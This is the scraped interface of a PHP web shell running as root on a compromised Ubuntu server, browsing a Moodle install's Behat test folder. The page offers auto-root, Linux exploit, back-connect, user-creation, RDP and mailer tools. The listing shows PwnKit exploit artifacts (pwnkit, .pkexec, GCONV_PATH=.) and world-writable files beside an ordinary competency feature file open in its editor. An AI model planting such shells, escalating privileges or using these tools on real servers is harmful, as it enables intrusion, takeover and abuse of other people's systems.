Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
lp /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_tool_lp.php
5.46
KB
-rwxrwxrwx
behat_tool_lp_data_generators....
12.48
KB
-rwxrwxrwx
course_competencies.feature
2.78
KB
-rwxrwxrwx
framework_crud.feature
6.2
KB
-rwxrwxrwx
plan_crud.feature
7
KB
-rwxrwxrwx
plan_workflow.feature
8.72
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
template_crud.feature
2.93
KB
-rwxrwxrwx
user_evidence_comp_link.featur...
2.95
KB
-rwxrwxrwx
user_evidence_crud.feature
3.29
KB
-rwxrwxrwx
view_competencies.feature
9.49
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user_evidence_comp_link.feature
@tool @javascript @tool_lp @tool_lp_user_evidence_comp_link Feature: Manage competencies linked to evidence of prior learning To link or unlink competency to evidence of prior learning As learning plan admin I need to link and unlink competencies from evidence of prior learning Background: Given the following lp "frameworks" exist: | shortname | idnumber | | Test-Framework | ID-FW1 | And the following lp "competencies" exist: | shortname | framework | | Test-Comp1 | ID-FW1 | | Test-Comp2 | ID-FW1 | And the following lp "plans" exist: | name | user | description | | Test-Plan | admin | Plan description | And the following lp "plancompetencies" exist: | plan | competency | | Test-Plan | Test-Comp1 | | Test-Plan | Test-Comp2 | And the following lp "userevidence" exist: | name | description | user | | Test-Evidence | Description evidence | admin | When I log in as "admin" And I follow "Profile" in the user menu And I follow "Learning plans" Then I should see "Evidence of prior learning" Scenario: Link competency to evidence of prior learning from page Given I follow "Evidence of prior learning" And I should see "List of evidence" And I should see "Test-Evidence" And I click on "Test-Evidence" "link" And I should see "Linked competencies" And I press "Link competencies" And "Competency picker" "dialogue" should be visible And I select "Test-Comp1" of the competency tree When I click on "Add" "button" in the "Competency picker" "dialogue" Then "Test-Comp1" "table_row" should exist Scenario: Link competency to evidence of prior learning from list Given I follow "Evidence of prior learning" And I change window size to "large" And I should see "List of evidence" And I should see "Test-Evidence" And I click on "Link" of edit menu in the "Test-Evidence" row And "Competency picker" "dialogue" should be visible And I select "Test-Comp2" of the competency tree When I click on "Add" "button" in the "Competency picker" "dialogue" Then "Test-Comp2" "table_row" should exist Scenario: Unlink competency from evidence of prior learning Given the following lp "userevidencecompetencies" exist: | userevidence | competency | | Test-Evidence | Test-Comp1 | | Test-Evidence | Test-Comp2 | Given the following lp "usercompetencies" exist: | user | competency | | admin | Test-Comp1 | | admin | Test-Comp2 | And I follow "Evidence of prior learning" And I should see "List of evidence" And I should see "Test-Evidence" And I click on "Test-Evidence" "link" And I should see "Linked competencies" And I should see "Test-Comp1" And I should see "Test-Comp2" When I click on "Delete" "link" in the "Test-Comp1" "table_row" And I wait until the page is ready Then I should not see "Test-Comp1" And I should see "Test-Comp2"
Close